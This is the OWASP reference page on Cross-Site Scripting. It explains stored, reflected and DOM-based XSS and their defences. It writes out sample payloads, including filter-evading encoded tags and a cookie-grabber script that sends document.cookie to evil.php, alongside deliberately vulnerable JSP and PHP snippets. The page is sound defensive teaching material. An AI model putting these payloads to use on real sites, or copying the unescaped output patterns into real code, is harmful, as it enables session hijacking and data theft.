<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">



<meta name="description" content="Cross Site Scripting (XSS) on the main website for The OWASP Foundation. OWASP is a nonprofit foundation that works to improve the security of software.">
<meta property="og:description" content="Cross Site Scripting (XSS) on the main website for The OWASP Foundation. OWASP is a nonprofit foundation that works to improve the security of software.">
<meta propery="og:title" content="Cross Site Scripting (XSS) | OWASP">
<meta property="og:url" content="https://owasp.org/www-community/attacks/xss/">
<meta property="og:locale" content="en_US">

<!-- should probably look at using article at some point for www-community at least -->
<meta property="og:type" content="website" />
<meta property="og:image" content="https://owasp.org/www--site-theme/favicon.ico" />
<meta http-equiv="X-Content-Type-Options" content="nosniff">
<meta http-equiv="X-Frame-Options" content="SAMEORIGIN">
<meta http-equiv="X-XSS-Protection" content="1; mode=block">


<link rel="canonical" href="https://owasp.org/www-community/attacks/xss/" />
<!-- Global site tag (gtag.js) - Google Analytics -->
<!-- <script async src="https://www.googletagmanager.com/gtag/js?id=UA-4531126-1"></script> -->
<!-- <script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-4531126-1');
</script> -->
<!-- Google Analytics -->
<script>
  window.ga=window.ga||function(){(ga.q=ga.q||[]).push(arguments)};ga.l=+new Date;
  ga('create', 'UA-4531126-1', 'auto');
  ga('send', 'pageview');

  function handleOutboundLinkClicks(event) {
    var href = '';
    if(event.target.href == undefined)
      href = event.target.parentElement.href;
    else
      href = event.target.href
    
  ga('send', 'event', {
    eventCategory: 'Outbound Link',
    eventAction: 'click',
    eventLabel: href,
    transport: 'beacon'
  });
}
</script>
<script async src='https://www.google-analytics.com/analytics.js'></script>
<!-- End Google Analytics -->
<link rel="stylesheet" href="https://owasp.org/www--site-theme/assets/css/styles.css">
<link rel="shortcut icon" type="images/x-icon" href="https://owasp.org/www--site-theme/favicon.ico">


<script src="https://owasp.org/www--site-theme/assets/js/jquery-3.4.1.min.js"></script>
<script src="https://owasp.org/www--site-theme/assets/js/util.js"></script>
<script src="https://owasp.org/www--site-theme/assets/js/js.cookie.js"></script>
<script src="https://owasp.org/www--site-theme/assets/js/yaml.min.js"></script>
<title>Cross Site Scripting (XSS) | OWASP</title>

    <script type="text/javascript">
      $(function(){
        var baseurl = "https://github.com/OWASP/www-community/blob/master/";
        var path = "pages/attacks/Cross-site-Scripting-(XSS).md";
        $('.repo').html('<a href=' + baseurl + path + '><div class="reset-3c756112--menuItemIcon-206eb252" style="float: left;"><svg preserveAspectRatio="xMidYMid meet" height="1em" width="1em" fill="currentColor" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 438.549 438.549" stroke="none" class="icon-7f6730be--text-3f89f380"><g><path d="M409.132 114.573c-19.608-33.596-46.205-60.194-79.798-79.8-33.598-19.607-70.277-29.408-110.063-29.408-39.781 0-76.472 9.804-110.063 29.408-33.596 19.605-60.192 46.204-79.8 79.8C9.803 148.168 0 184.854 0 224.63c0 47.78 13.94 90.745 41.827 128.906 27.884 38.164 63.906 64.572 108.063 79.227 5.14.954 8.945.283 11.419-1.996 2.475-2.282 3.711-5.14 3.711-8.562 0-.571-.049-5.708-.144-15.417a2549.81 2549.81 0 0 1-.144-25.406l-6.567 1.136c-4.187.767-9.469 1.092-15.846 1-6.374-.089-12.991-.757-19.842-1.999-6.854-1.231-13.229-4.086-19.13-8.559-5.898-4.473-10.085-10.328-12.56-17.556l-2.855-6.57c-1.903-4.374-4.899-9.233-8.992-14.559-4.093-5.331-8.232-8.945-12.419-10.848l-1.999-1.431c-1.332-.951-2.568-2.098-3.711-3.429-1.142-1.331-1.997-2.663-2.568-3.997-.572-1.335-.098-2.43 1.427-3.289 1.525-.859 4.281-1.276 8.28-1.276l5.708.853c3.807.763 8.516 3.042 14.133 6.851 5.614 3.806 10.229 8.754 13.846 14.842 4.38 7.806 9.657 13.754 15.846 17.847 6.184 4.093 12.419 6.136 18.699 6.136 6.28 0 11.704-.476 16.274-1.423 4.565-.952 8.848-2.383 12.847-4.285 1.713-12.758 6.377-22.559 13.988-29.41-10.848-1.14-20.601-2.857-29.264-5.14-8.658-2.286-17.605-5.996-26.835-11.14-9.235-5.137-16.896-11.516-22.985-19.126-6.09-7.614-11.088-17.61-14.987-29.979-3.901-12.374-5.852-26.648-5.852-42.826 0-23.035 7.52-42.637 22.557-58.817-7.044-17.318-6.379-36.732 1.997-58.24 5.52-1.715 13.706-.428 24.554 3.853 10.85 4.283 18.794 7.952 23.84 10.994 5.046 3.041 9.089 5.618 12.135 7.708 17.705-4.947 35.976-7.421 54.818-7.421s37.117 2.474 54.823 7.421l10.849-6.849c7.419-4.57 16.18-8.758 26.262-12.565 10.088-3.805 17.802-4.853 23.134-3.138 8.562 21.509 9.325 40.922 2.279 58.24 15.036 16.18 22.559 35.787 22.559 58.817 0 16.178-1.958 30.497-5.853 42.966-3.9 12.471-8.941 22.457-15.125 29.979-6.191 7.521-13.901 13.85-23.131 18.986-9.232 5.14-18.182 8.85-26.84 11.136-8.662 2.286-18.415 4.004-29.263 5.146 9.894 8.562 14.842 22.077 14.842 40.539v60.237c0 3.422 1.19 6.279 3.572 8.562 2.379 2.279 6.136 2.95 11.276 1.995 44.163-14.653 80.185-41.062 108.068-79.226 27.88-38.161 41.825-81.126 41.825-128.906-.01-39.771-9.818-76.454-29.414-110.049z"></path></g></svg><span style="padding-left:8px;">Edit on Github</span></div></a>');
      });
    </script>
    <script async defer src="https://buttons.github.io/buttons.js"></script>
  </head>
  <body class="base-grid col-sidebar">

    <div id="blocker"></div>

    <noscript>For full functionality of this site it is necessary to enable JavaScript. Here are the <a href="https://www.enable-javascript.com/"> instructions how to enable JavaScript in your web browser</a>.</noscript>
    <header role="banner">
  <div id="banner" class="notice" aria-label="announcement">
 
 <p>Global AppSec Dublin <a href="https://dublin.globalappsec.org/?utm_source=owasp-web&utm_medium=banner&utm_campaign=none" target="_blank">registration is open</a>. Enjoy Early Bird Pricing until March 31st.</p>

  <a href="#" id="close-banner" aria-label="close announcement">
    <i class="fa fa-times"></i>
  </a>
</div>



  <div class="header-wrapper" aria-label="main navigation">

    <nav class="alt-nav">
      <a href="#" class="menu-toggler" aria-hidden="true">
        <i class="fa fa-bars"></i>
      </a>
      <a href="/" class="alt-logo" aria-label="go to homepage">
          <img src="/assets/images/logo.png" alt="OWASP logo">
      </a>
      <div id="overlay" class="remove-el">

      </div>
      <!-- jekyll menu stuff -->
    </nav>
    
    <nav class="top-nav" role="navigation" aria-label="primary navigation">
      <a href="/" class="desktop-logo" aria-label="go to homepage">
        <img src="/assets/images/logo.png" alt="">
      </a>
      <!-- jekyll menu stuff -->
      
      <div class="interactive-wrapper">
        <form role="search" method="get" action="/search">   
          <div class='search-div'>
            <input id="searchString" name="searchString" class="search-bar" type="search" placeholder="Search OWASP.org" required="true">
            <button id="search-button" type="submit" class="fa fa-search">
                <!--<span id="search-icon" tabindex="0"><i class="fa fa-search"></i></span>-->
            </button>
          </div>  
        </form>
        <div class="nav-button" aria-label="donate to or join OWASP">
        
          <a href="/donate?reponame=www-community" class="cta-button green">Donate</a>
          <a href="/membership" class="cta-button">Join</a>
        </div>
      </div>
    </nav>
  </div>




<script type="text/javascript">
  $(function(){
      
      url = $(location).attr('href');
      if(url.includes('www2'))
      {
        url = url.replace(/www2./, '');
        $(location).attr('href',url);
        return;
      }
    // this works to get data from a json file NOT in data
      $.getJSON("https://owasp.org/www--site-theme/assets/sitedata/menus.json", function(data) {
         var listr = "<ul aria-label='header menu'>";
         
         var mlistr = "<ul class='mobile-menu hide-el' role='navigation' aria-label='mobile primary navigation'>";

          mlistr += "<li><a href='#' class='menu-toggler' aria-hidden='true'><i class='fa fa-times'></i></a></li>";
          mlistr += "<li>";
          mlistr += "<form role='search' method='get' action='/search'>";   
          mlistr += "<div class='search-div'>";
          mlistr += "<input id='searchString' name='searchString' class='search-bar' type='search' placeholder='Search OWASP.org' required='true'>";
          mlistr += "<button id='search-button' type='submit' class='fa fa-search' style='padding-left: 8px;'></button></div></form>";
          mlistr += "</li>";
          $.each(data.menus, function (ndx, menu){
              listr += "<li><a href='" + menu.url + "'>" + menu.title + "</a>";

              if(!menu.items)
              {
                  mlistr += "<li><a href='" + menu.url + "'>" + menu.title + "</a>";
              }
              
              if(menu.items){
                  listr += "<ul class='dropdown-menu'>";
                  mlistr += "<button class='accordion'>" + menu.title + "</button>";
                  mlistr += "<div class='panel'>";
                  mlistr += "<ul>";
                $.each(menu.items, function(ndx, item){
                
                  if(item.separator)
                  {
                      listr += "<li class='separator'>";
                      mlistr += "<li class='separator'>";
                  }
                  else
                  {
                      listr += "<li>";
                      mlistr += "<li>";
                  }
                  listr += "<a href='" + item.url + "'";
                  mlistr += "<a href='" + item.url + "'";
                  if(item.opentab)
                  {
                    listr += " target='_blank' rel='noopener'";
                    mlistr += " target='_blank' rel='noopener'";
                  }

                  listr += ">" + item.title + "</a></li>";
                  mlistr += ">" + item.title + "</a></li>";
                });
                listr += "</ul>";
                mlistr += "</ul>";
                mlistr += "</div>"
              }
              
              listr += "</li>";
              mlistr += "</li>";
          });
          listr += "</ul>";
          mlistr += "<li><a href='/donate'>MAKE A DONATION</a></li>";
          mlistr += "<li><a href='/membership'>BECOME A MEMBER</a></li>";
          mlistr += "<li><a href='/sitemap'>SITEMAP</a></li>";
          mlistr += "</ul>";
          
          $('.desktop-logo').after(listr);
          $('#overlay').after(mlistr);

          $(".accordion").click(function () {
              $(this).toggleClass("active");
              if($(this).next('.panel').css('display') == 'block'){
                $(this).next('.panel').css('display', 'none');
              }
              else {
                $(this).next('.panel').css('display', 'block');
              }
            });
            $(".menu-toggler").click(function() {
              $(".mobile-menu").toggleClass('hide-el');
            });
      });
    });
  </script>
</header>


    <main role="main">
      <div class="main-wrapper">
        
  
  
  
  
  
  
  





        <h1 class="page-title">Cross Site Scripting (XSS)</h1>
        <div id="main" class="page-body tab" role="tabpanel" aria-labelledby="main-link" tabindex="0">
          
          <section class="news-events">
            <div class="alert">  
             <p>Thank you for visiting OWASP.org. We recently migrated our community to a new web platform and regretably the content for this page needed to be programmatically ported from its previous wiki page. There’s still some work to be done. </p>
            </div>
            
          </section>
         
         
         <p hidden>This is an example of a Project or Chapter Page.</p>
          
          <section id='sec-main' class='page-body'>
          <h2 id="overview">Overview</h2>

<p>Cross-Site Scripting (XSS) attacks are a type of injection, in which
malicious scripts are injected into otherwise benign and trusted
websites. XSS attacks occur when an attacker uses a web application to
send malicious code, generally in the form of a browser side script, to
a different end user. Flaws that allow these attacks to succeed are
quite widespread and occur anywhere a web application uses input from a
user within the output it generates without validating or encoding it.</p>

<p>An attacker can use XSS to send a malicious script to an unsuspecting
user. The end user’s browser has no way to know that the script should
not be trusted, and will execute the script. Because it thinks the
script came from a trusted source, the malicious script can access any
cookies, session tokens, or other sensitive information retained by the
browser and used with that site. These scripts can even rewrite the
content of the HTML page. For more details on the different types of XSS
flaws, see: <a href="Types_of_Cross-Site_Scripting" title="wikilink">Types of Cross-Site
Scripting</a>.</p>

<h2 id="related-security-activities">Related Security Activities</h2>

<h3 id="how-to-avoid-cross-site-scripting-vulnerabilities">How to Avoid Cross-site scripting Vulnerabilities</h3>

<p>See the <a href="xss">XSS (Cross Site Scripting) Prevention Cheat
Sheet</a></p>

<p>See the <a href="DOM_based_XSS_Prevention_Cheat_Sheet" title="wikilink">DOM based XSS Prevention Cheat
Sheet</a></p>

<p>See the <a href=":Category:OWASP_Guide_Project" title="wikilink">OWASP Development
Guide</a> article on
<a href="Phishing" title="wikilink">Phishing</a>.</p>

<p>See the <a href=":Category:OWASP_Guide_Project" title="wikilink">OWASP Development
Guide</a> article on <a href="Data_Validation" title="wikilink">Data
Validation</a>.</p>

<h3 id="how-to-review-code-for-cross-site-scripting-vulnerabilities">How to Review Code for Cross-site scripting Vulnerabilities</h3>

<p>See the <a href=":Category:OWASP_Code_Review_Project" title="wikilink">OWASP Code Review
Guide</a> article on
<a href="Reviewing_Code_for_Cross-site_scripting" title="wikilink">Reviewing Code for Cross-site
scripting</a>
Vulnerabilities.</p>

<h3 id="how-to-test-for-cross-site-scripting-vulnerabilities">How to Test for Cross-site scripting Vulnerabilities</h3>

<p>See the latest <a href=":Category:OWASP_Testing_Project" title="wikilink">OWASP Testing
Guide</a> article on how to
test for the various kinds of XSS vulnerabilities.</p>

<ul>
  <li><a href="Testing_for_Reflected_Cross_site_scripting_\(OWASP-DV-001\)" title="wikilink">Testing_for_Reflected_Cross_site_scripting_(OWASP-DV-001)</a></li>
  <li><a href="Testing_for_Stored_Cross_site_scripting_\(OWASP-DV-002\)" title="wikilink">Testing_for_Stored_Cross_site_scripting_(OWASP-DV-002)</a></li>
  <li><a href="Testing_for_DOM-based_Cross_site_scripting_\(OWASP-DV-003\)" title="wikilink">Testing_for_DOM-based_Cross_site_scripting_(OWASP-DV-003)</a></li>
</ul>

<h2 id="description">Description</h2>

<p>Cross-Site Scripting (XSS) attacks occur when:</p>

<ol>
  <li>Data enters a Web application through an untrusted source, most
frequently a web request.</li>
  <li>The data is included in dynamic content that is sent to a web user
without being validated for malicious content.</li>
</ol>

<p>The malicious content sent to the web browser often takes the form of a
segment of JavaScript, but may also include HTML, Flash, or any other
type of code that the browser may execute. The variety of attacks based
on XSS is almost limitless, but they commonly include transmitting
private data, like cookies or other session information, to the
attacker, redirecting the victim to web content controlled by the
attacker, or performing other malicious operations on the user’s machine
under the guise of the vulnerable site.</p>

<h3 id="stored-and-reflected-xss-attacks"><a href="#Stored_and_Reflected_XSS_Attacks" title="wikilink">Stored and Reflected XSS Attacks</a></h3>

<p>XSS attacks can generally be categorized into two categories: stored and
reflected. There is a third, much less well-known type of XSS attack
called <a href="DOM_Based_XSS" title="wikilink">DOM Based XSS</a> that is discussed
separately <a href="DOM_Based_XSS" title="wikilink">here</a>.</p>

<h4 id="stored-xss-attacks">Stored XSS Attacks</h4>

<p>Stored attacks are those where the injected script is permanently stored
on the target servers, such as in a database, in a message forum,
visitor log, comment field, etc. The victim then retrieves the malicious
script from the server when it requests the stored information. Stored
XSS is also sometimes referred to as Persistent or Type-I XSS.</p>

<h4 id="reflected-xss-attacks">Reflected XSS Attacks</h4>

<p>Reflected attacks are those where the injected script is reflected off
the web server, such as in an error message, search result, or any other
response that includes some or all of the input sent to the server as
part of the request. Reflected attacks are delivered to victims via
another route, such as in an e-mail message, or on some other website.
When a user is tricked into clicking on a malicious link, submitting a
specially crafted form, or even just browsing to a malicious site, the
injected code travels to the vulnerable web site, which reflects the
attack back to the user’s browser. The browser then executes the code
because it came from a “trusted” server. Reflected XSS is also sometimes
referred to as Non-Persistent or Type-II XSS.</p>

<h3 id="other-types-of-xss-vulnerabilities">Other Types of XSS Vulnerabilities</h3>

<p>In addition to Stored and Reflected XSS, another type of XSS, <a href="DOM_Based_XSS" title="wikilink">DOM Based
XSS</a> was identified by <a href="http://www.webappsec.org/projects/articles/071105.shtml">Amit Klein
in 2005</a>. OWASP
recommends the XSS categorization as described in the OWASP Article:
<a href="Types_of_Cross-Site_Scripting" title="wikilink">Types of Cross-Site
Scripting</a>, which covers all
these XSS terms, organizing them into a matrix of Stored vs. Reflected
XSS and Server vs. Client XSS, where DOM Based XSS is a subset of Client
XSS.</p>

<h4 id="xss-attack-consequences">XSS Attack Consequences</h4>

<p>The consequence of an XSS attack is the same regardless of whether it is
stored or reflected (<a href="DOM_Based_XSS" title="wikilink">or DOM Based</a>). The
difference is in how the payload arrives at the server. Do not be fooled
into thinking that a “read-only” or “brochureware” site is not
vulnerable to serious reflected XSS attacks. XSS can cause a variety of
problems for the end user that range in severity from an annoyance to
complete account compromise. The most severe XSS attacks involve
disclosure of the user’s session cookie, allowing an attacker to hijack
the user’s session and take over the account. Other damaging attacks
include the disclosure of end user files, installation of Trojan horse
programs, redirect the user to some other page or site, or modify
presentation of content. An XSS vulnerability allowing an attacker to
modify a press release or news item could affect a company’s stock price
or lessen consumer confidence. An XSS vulnerability on a pharmaceutical
site could allow an attacker to modify dosage information resulting in
an overdose. For more information on these types of attacks see
<a href="Content_Spoofing" title="wikilink">Content_Spoofing</a>.</p>

<h3 id="how-to-determine-if-you-are-vulnerable">How to Determine If You Are Vulnerable</h3>

<p>XSS flaws can be difficult to identify and remove from a web
application. The best way to find flaws is to perform a security review
of the code and search for all places where input from an HTTP request
could possibly make its way into the HTML output. Note that a variety of
different HTML tags can be used to transmit a malicious JavaScript.
Nessus, Nikto, and some other available tools can help scan a website
for these flaws, but can only scratch the surface. If one part of a
website is vulnerable, there is a high likelihood that there are other
problems as well.</p>

<h3 id="how-to-protect-yourself">How to Protect Yourself</h3>

<p>The primary defenses against XSS are described in the <a href="XSS_\(Cross_Site_Scripting\)_Prevention_Cheat_Sheet" title="wikilink">OWASP XSS
Prevention Cheat
Sheet</a>.</p>

<p>Also, it’s crucial that you turn off HTTP TRACE support on all web
servers. An attacker can steal cookie data via Javascript even when
document.cookie is disabled or not supported by the client. This attack
is mounted when a user posts a malicious script to a forum so when
another user clicks the link, an asynchronous HTTP Trace call is
triggered which collects the user’s cookie information from the server,
and then sends it over to another malicious server that collects the
cookie information so the attacker can mount a session hijack attack.
This is easily mitigated by removing support for HTTP TRACE on all web
servers.</p>

<p>The <a href="ESAPI" title="wikilink">OWASP ESAPI project</a> has produced a set of
reusable security components in several languages, including validation
and escaping routines to prevent parameter tampering and the injection
of XSS attacks. In addition, the <a href=":Category:OWASP_WebGoat_Project" title="wikilink">OWASP WebGoat
Project</a> training
application has lessons on Cross-Site Scripting and data encoding.</p>

<h3 id="alternate-xss-syntax">Alternate XSS Syntax</h3>

<h4 id="xss-using-script-in-attributes">XSS using Script in Attributes</h4>

<p>XSS attacks may be conducted without using</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>&lt;script&gt;

&lt;/script&gt;
</code></pre></div></div>

<p>tags. Other tags will do exactly the same thing, for example:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>&lt;body onload=alert('test1')&gt;
</code></pre></div></div>

<p>or other attributes like: onmouseover, onerror.</p>

<p>onmouseover</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>&lt;b onmouseover=alert('Wufff!')&gt;click me!&lt;/b&gt;
</code></pre></div></div>

<p>onerror</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>&lt;img src="http://url.to.file.which/not.exist" onerror=alert(document.cookie);&gt;
</code></pre></div></div>

<h4 id="xss-using-script-via-encoded-uri-schemes">XSS using Script Via Encoded URI Schemes</h4>

<p>If we need to hide against web application filters we may try to encode
string characters, e.g.: a=&amp;#X41 (UTF-8) and use it in IMG tags:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>&lt;IMG SRC=j&amp;#X41vascript:alert('test2')&gt;
</code></pre></div></div>

<p>There are many different UTF-8 encoding notations what give us even more
possibilities.</p>

<h4 id="xss-using-code-encoding">XSS using code encoding</h4>

<p>We may encode our script in base64 and place it in META tag. This way we
get rid of alert() totally. More information about this method can be
found in RFC 2397</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>&lt;META HTTP-EQUIV="refresh"
CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg"&gt;
</code></pre></div></div>

<p>These and others examples can be found at the OWASP <a href="XSS_Filter_Evasion_Cheat_Sheet" title="wikilink">XSS Filter Evasion
Cheat Sheet</a> which is a true
encyclopedia of the alternate XSS syntax attack.</p>

<h2 id="examples">Examples</h2>

<p>Cross-site scripting attacks may occur anywhere that possibly malicious
users are allowed to post unregulated material to a trusted website for
the consumption of other valid users.</p>

<p>The most common example can be found in bulletin-board websites which
provide web based mailing list-style functionality.</p>

<h3 id="example-1">Example 1</h3>

<p>The following JSP code segment reads an employee ID, eid, from an HTTP
request and displays it to the user.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    &lt;% String eid = request.getParameter("eid"); %&gt;
    ...
    Employee ID: &lt;%= eid %&gt;
</code></pre></div></div>

<p>The code in this example operates correctly if eid contains only
standard alphanumeric text. If eid has a value that includes
meta-characters or source code, then the code will be executed by the
web browser as it displays the HTTP response.</p>

<p>Initially, this might not appear to be much of a vulnerability. After
all, why would someone enter a URL that causes malicious code to run on
their own computer? The real danger is that an attacker will create the
malicious URL, then use e-mail or social engineering tricks to lure
victims into visiting a link to the URL. When victims click the link,
they unwittingly reflect the malicious content through the vulnerable
web application back to their own computers. This mechanism of
exploiting vulnerable web applications is known as Reflected XSS.</p>

<h3 id="example-2">Example 2</h3>

<p>The following JSP code segment queries a database for an employee with a
given ID and prints the corresponding employee’s name.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
    &lt;%...
     Statement stmt = conn.createStatement();
     ResultSet rs = stmt.executeQuery("select * from emp where id="+eid);
     if (rs != null) {
      rs.next();
      String name = rs.getString("name");
    %&gt;

    Employee Name: &lt;%= name %&gt;
</code></pre></div></div>

<p>As in Example 1, this code functions correctly when the values of name
are well-behaved, but it does nothing to prevent exploits if they are
not. Again, this code can appear less dangerous because the value of
name is read from a database, whose contents are apparently managed by
the application. However, if the value of name originates from
user-supplied data, then the database can be a conduit for malicious
content. Without proper input validation on all data stored in the
database, an attacker can execute malicious commands in the user’s web
browser. This type of exploit, known as Stored XSS, is particularly
insidious because the indirection caused by the data store makes it more
difficult to identify the threat and increases the possibility that the
attack will affect multiple users. XSS got its start in this form with
websites that offered a “guestbook” to visitors. Attackers would include
JavaScript in their guestbook entries, and all subsequent visitors to
the guestbook page would execute the malicious code.</p>

<p>As the examples demonstrate, XSS vulnerabilities are caused by code that
includes unvalidated data in an HTTP response. There are three vectors
by which an XSS attack can reach a victim:</p>

<ul>
  <li>As in Example 1, data is read directly from the HTTP request and
reflected back in the HTTP response. Reflected XSS exploits occur
when an attacker causes a user to supply dangerous content to a
vulnerable web application, which is then reflected back to the user
and executed by the web browser. The most common mechanism for
delivering malicious content is to include it as a parameter in a
URL that is posted publicly or e-mailed directly to victims. URLs
constructed in this manner constitute the core of many phishing
schemes, whereby an attacker convinces victims to visit a URL that
refers to a vulnerable site. After the site reflects the attacker’s
content back to the user, the content is executed and proceeds to
transfer private information, such as cookies that may include
session information, from the user’s machine to the attacker or
perform other nefarious activities.</li>
  <li>As in Example 2, the application stores dangerous data in a database
or other trusted data store. The dangerous data is subsequently read
back into the application and included in dynamic content. Stored
XSS exploits occur when an attacker injects dangerous content into a
data store that is later read and included in dynamic content. From
an attacker’s perspective, the optimal place to inject malicious
content is in an area that is displayed to either many users or
particularly interesting users. Interesting users typically have
elevated privileges in the application or interact with sensitive
data that is valuable to the attacker. If one of these users
executes malicious content, the attacker may be able to perform
privileged operations on behalf of the user or gain access to
sensitive data belonging to the user.</li>
  <li>A source outside the application stores dangerous data in a database
or other data store, and the dangerous data is subsequently read
back into the application as trusted data and included in dynamic
content.</li>
</ul>

<h3 id="attack-examples">Attack Examples</h3>

<p><strong>Example 1: Cookie Grabber</strong></p>

<p>If the application doesn’t validate the input data, the attacker can
easily steal a cookie from an authenticated user. All the attacker has
to do is to place the following code in any posted input(ie: message
boards, private messages, user profiles):</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>&lt;SCRIPT type="text/javascript"&gt;
var adr = '../evil.php?cakemonster=' + escape(document.cookie);
&lt;/SCRIPT&gt;
</code></pre></div></div>

<p>The above code will pass an escaped content of the cookie (according to
RFC content must be escaped before sending it via HTTP protocol with GET
method) to the evil.php script in “cakemonster” variable. The attacker
then checks the results of his evil.php script (a cookie grabber script
will usually write the cookie to a file) and use it.</p>

<h3 id="error-page-example">Error Page Example</h3>

<p>Let’s assume that we have an error page, which is handling requests for
a non existing pages, a classic 404 error page. We may use the code
below as an example to inform user about what specific page is missing:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>&lt;html&gt;
&lt;body&gt;

&lt;? php
print "Not found: " . urldecode($_SERVER["REQUEST_URI"]);
?&gt;

&lt;/body&gt;
&lt;/html&gt;
</code></pre></div></div>

<p>Let’s see how it works:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>http://testsite.test/file_which_not_exist
</code></pre></div></div>

<p>In response we get:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Not found: /file_which_not_exist
</code></pre></div></div>

<p>Now we will try to force the error page to include our code:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>http://testsite.test/&lt;script&gt;alert("TEST");&lt;/script&gt;
</code></pre></div></div>

<p>The result is:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Not found: / (but with JavaScript code &lt;script&gt;alert("TEST");&lt;/script&gt;)
</code></pre></div></div>

<p>We have successfully injected the code, our XSS! What does it mean? For
example, that we may use this flaw to try to steal a user’s session
cookie.</p>

<h2 id="related-attacks">Related <a href="Attacks" title="wikilink">Attacks</a></h2>

<ul>
  <li><a href="XSS_Attacks" title="wikilink">XSS Attacks</a></li>
  <li><a href=":Category:Injection_Attack" title="wikilink">:Category:Injection Attack</a></li>
  <li><a href="Invoking_untrusted_mobile_code" title="wikilink">Invoking untrusted mobile
code</a></li>
  <li><a href="Cross_Site_History_Manipulation_\(XSHM\)" title="wikilink">Cross Site History Manipulation
(XSHM)</a></li>
</ul>

<h2 id="related-vulnerabilities">Related <a href="Vulnerabilities" title="wikilink">Vulnerabilities</a></h2>

<ul>
  <li><a href=":Category:Input_Validation_Vulnerability" title="wikilink">:Category:Input Validation
Vulnerability</a></li>
  <li><a href="Cross_Site_Scripting_Flaw" title="wikilink">Cross Site Scripting Flaw</a></li>
  <li><a href="Types_of_Cross-Site_Scripting" title="wikilink">Types of Cross-Site
Scripting</a></li>
</ul>

<h2 id="related-controls">Related <a href="Controls" title="wikilink">Controls</a></h2>

<ul>
  <li><a href=":Category:Input_Validation" title="wikilink">:Category:Input Validation</a></li>
  <li><a href="HTML_Entity_Encoding" title="wikilink">HTML Entity Encoding</a></li>
  <li><a href="Output_Validation" title="wikilink">Output Validation</a></li>
  <li><a href="Canonicalization" title="wikilink">Canonicalization</a></li>
</ul>

<h2 id="references">References</h2>

<ul>
  <li>OWASP’s <a href="XSS_\(Cross_Site_Scripting\)_Prevention_Cheat_Sheet" title="wikilink">XSS (Cross Site Scripting) Prevention Cheat
Sheet</a></li>
  <li>OWASP Guide to Building Secure Web Applications and Web Services,
Chapter 8: <a href="Data_Validation" title="wikilink">Data Validation</a></li>
  <li>OWASP Testing Guide,
<a href="Testing_for_Reflected_Cross_site_scripting_\(OWASP-DV-001\)" title="wikilink">Testing_for_Reflected_Cross_site_scripting_(OWASP-DV-001)</a></li>
  <li>OWASP Testing Guide,
<a href="Testing_for_Stored_Cross_site_scripting_\(OWASP-DV-002\)" title="wikilink">Testing_for_Stored_Cross_site_scripting_(OWASP-DV-002)</a></li>
  <li>OWASP Testing Guide,
<a href="Testing_for_DOM-based_Cross_site_scripting_\(OWASP-DV-003\)" title="wikilink">Testing_for_DOM-based_Cross_site_scripting_(OWASP-DV-003)</a></li>
  <li>OWASP’s <a href="How_to_Build_an_HTTP_Request_Validation_Engine_for_Your_J2EE_Application" title="wikilink">How to Build an HTTP Request Validation Engine (J2EE
validation using OWASP’s
Stinger)</a></li>
  <li>Google Code Best Practice Guide:
<a href="http://code.google.com/p/doctype/wiki/ArticlesXSS">http://code.google.com/p/doctype/wiki/ArticlesXSS</a></li>
  <li>The Cross Site Scripting FAQ:
<a href="http://www.cgisecurity.com/articles/xss-faq.shtml">http://www.cgisecurity.com/articles/xss-faq.shtml</a></li>
  <li>OWASP <a href="XSS_Filter_Evasion_Cheat_Sheet" title="wikilink">XSS Filter Evasion Cheat
Sheet</a></li>
  <li>CERT Advisory on Malicious HTML Tags:
<a href="http://www.cert.org/advisories/CA-2000-02.html">http://www.cert.org/advisories/CA-2000-02.html</a></li>
  <li>CERT “Understanding Malicious Content Mitigation”
<a href="http://www.cert.org/tech_tips/malicious_code_mitigation.html">http://www.cert.org/tech_tips/malicious_code_mitigation.html</a></li>
  <li>Understanding the cause and effect of CSS Vulnerabilities:
<a href="http://www.technicalinfo.net/papers/CSS.html">http://www.technicalinfo.net/papers/CSS.html</a></li>
  <li>XSSed - Cross-Site Scripting (XSS) Information and Mirror Archive of
Vulnerable Websites <a href="http://www.xssed.com">http://www.xssed.com</a></li>
</ul>

<p><a href="Category:OWASP_ASDR_Project" title="wikilink">Category:OWASP ASDR Project</a>
<a href="Category:Security_Focus_Area" title="wikilink">Category:Security Focus Area</a>
<a href="Category:Injection" title="wikilink">Category:Injection</a> <a href="Category:OWASP_Top_Ten_Project" title="wikilink">Category:OWASP Top
Ten Project</a> <a href="Category:Code_Snippet" title="wikilink">Category:Code
Snippet</a> <a href="Category:Security_Focus_Area" title="wikilink">Category:Security Focus
Area</a>
<a href="Category:Attack" title="wikilink">Category:Attack</a>
<a href="Category:Popular" title="wikilink">Category:Popular</a></p>

          </section>
          

          
          
          
          
          
          
          
       </div>
       <hr>
       <div class="repo">
       </div>

          <div class="github-buttons">
    <a class="github-button" href="https://github.com/owasp/www-community/subscription" data-icon="octicon-eye" data-size="large" data-show-count="true" aria-label="Watch on GitHub">Watch</a>
    <a class="github-button" href="https://github.com/owasp/www-community" data-icon="octicon-star" data-size="large" data-show-count="true" aria-label="Star on GitHub">Star</a>
 </div>

          <div class="sidebar" role="complementary">
    

    
    
       



  
